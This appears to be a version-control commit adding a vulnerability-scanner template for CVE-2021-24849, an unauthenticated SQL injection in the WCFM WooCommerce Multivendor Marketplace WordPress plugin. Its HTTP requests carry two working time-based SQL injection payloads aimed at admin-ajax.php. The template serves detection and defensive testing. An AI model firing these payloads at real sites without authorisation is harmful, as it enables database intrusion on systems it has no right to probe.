Create CVE-2021-24849.yaml
parent
7c46896600
commit
8f18aa96f4
|
@ -0,0 +1,44 @@
|
|||
id: CVE-2021-24849
|
||||
|
||||
info:
|
||||
name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
|
||||
author: ritikchaddha
|
||||
severity: critical
|
||||
description: |
|
||||
The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
|
||||
remediation: Fixed in 3.4.12
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24849
|
||||
metadata:
|
||||
max-request: 1
|
||||
verified: true
|
||||
tags: cve,cve2021,wp,wp-plugin,wordpress,wcfm,sqli
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
@timeout: 20s
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
{{post_data}}
|
||||
|
||||
payloads:
|
||||
post_data:
|
||||
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
|
||||
- "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration_2>=5'
|
||||
- 'status_code == 200'
|
||||
- 'contains(body_1, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")'
|
||||
condition: and
|
Loading…
Reference in New Issue